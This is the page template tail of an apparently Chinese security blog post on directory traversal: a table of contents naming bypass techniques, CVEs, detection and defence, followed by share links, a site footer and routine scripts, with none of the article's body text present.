      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%8B%E7%BB%8D"><span class="toc-number">1.</span> <span class="toc-text">介绍</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A7%BF%E5%8A%BF"><span class="toc-number">2.</span> <span class="toc-text">姿势</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#0x00-%E5%9F%BA%E7%A1%80%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86"><span class="toc-number">2.1.</span> <span class="toc-text">0x00 基础目录遍历</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x01-%E7%BB%9D%E5%AF%B9%E8%B7%AF%E5%BE%84"><span class="toc-number">2.2.</span> <span class="toc-text">0x01 绝对路径</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x02-%E5%8F%8C%E5%86%99-%E7%BB%95%E8%BF%87"><span class="toc-number">2.3.</span> <span class="toc-text">0x02 双写..&#x2F;绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x03-URL%E7%BC%96%E7%A0%81%E7%BB%95%E8%BF%87"><span class="toc-number">2.4.</span> <span class="toc-text">0x03 URL编码绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x04-%E7%BB%9D%E5%AF%B9%E8%B7%AF%E5%BE%84%E9%85%8D%E5%90%88"><span class="toc-number">2.5.</span> <span class="toc-text">0x04 绝对路径配合 ..&#x2F;</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x05-%E6%88%AA%E6%96%AD%E6%96%87%E4%BB%B6%E5%90%8E%E7%BC%80"><span class="toc-number">2.6.</span> <span class="toc-text">0x05 截断文件后缀</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x0x"><span class="toc-number">2.7.</span> <span class="toc-text">0x0x</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%98%B2%E5%BE%A1"><span class="toc-number">3.</span> <span class="toc-text">防御</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E8%B7%AF%E5%BE%84%E6%95%B4%E7%90%86"><span class="toc-number">4.</span> <span class="toc-text">攻击路径整理</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E6%95%B4%E7%90%86"><span class="toc-number">4.1.</span> <span class="toc-text">文件整理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%B7%AF%E5%BE%84%E6%95%B4%E7%90%86"><span class="toc-number">4.2.</span> <span class="toc-text">路径整理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2014-3625"><span class="toc-number">4.3.</span> <span class="toc-text">CVE-2014-3625</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2018-1271"><span class="toc-number">4.4.</span> <span class="toc-text">CVE-2018-1271</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%B7%AF%E5%BE%84%E9%81%8D%E5%8E%86%E6%A3%80%E6%B5%8B"><span class="toc-number">4.5.</span> <span class="toc-text">路径遍历检测</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%98%B2%E5%BE%A1-1"><span class="toc-number">4.6.</span> <span class="toc-text">防御</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2021/04/25/%E6%B5%85%E8%B0%88%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2021/04/25/%E6%B5%85%E8%B0%88%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/&text=浅谈目录穿越"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2021/04/25/%E6%B5%85%E8%B0%88%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/&title=浅谈目录穿越"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2021/04/25/%E6%B5%85%E8%B0%88%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/&is_video=false&description=浅谈目录穿越"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=浅谈目录穿越&body=Check out this article: http://example.com/2021/04/25/%E6%B5%85%E8%B0%88%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2021/04/25/%E6%B5%85%E8%B0%88%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/&title=浅谈目录穿越"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2021/04/25/%E6%B5%85%E8%B0%88%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/&title=浅谈目录穿越"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2021/04/25/%E6%B5%85%E8%B0%88%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/&title=浅谈目录穿越"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2021/04/25/%E6%B5%85%E8%B0%88%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/&title=浅谈目录穿越"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2021/04/25/%E6%B5%85%E8%B0%88%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/&name=浅谈目录穿越&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2021/04/25/%E6%B5%85%E8%B0%88%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/&t=浅谈目录穿越"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2021
    Du1L0v3
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/links/">Links</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/duitutu">Projects</a></li>
        
         <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
         <span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span>
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdn.bootcdn.net/ajax/libs/font-awesome/5.15.2/css/all.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdn.bootcdn.net/ajax/libs/jquery/3.6.0/jquery.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.bootcdn.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->


</body>
</html>
